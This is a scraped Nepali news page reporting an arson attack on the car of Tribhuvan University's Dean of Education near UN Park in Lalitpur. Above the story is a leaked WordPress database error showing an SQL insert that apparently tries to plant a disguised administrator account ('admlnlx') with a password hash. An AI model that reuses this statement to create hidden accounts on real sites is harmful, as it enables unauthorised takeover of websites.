WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSN7SXF1O5zUfZ3acE6eEr4QN1hLPs0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 09:53:26', '', 'admlnlx', 'admlnlx')
काठमाडौ,फागुन २-
त्रिभुवन विश्वविद्यालयका शिक्षाध्यक्ष सुधा त्रिपाठीको गाडीमा अज्ञात समूहले आगजनी गरेको छ। त्रिपाठी स्वयम् चढेको बा २ च ५६५० नम्बरको गाडीमा सोमबार बिहान यूएन पार्क नजिकै आगजनी भएको जिल्ला प्रहरी कार्यालय ललितपुरले पुष्टि गर्यो। आगो स्थानीयको सहयोगमा नियन्त्रणमा लिइएको प्रहरीले जनाएको छ। आगजनी कसले र किन गर्यो भन्ने खुल्न सकेको छैन। संलग्नहरुको खोजी कार्य जारी रहेको प्रहरीले जनाएको छ।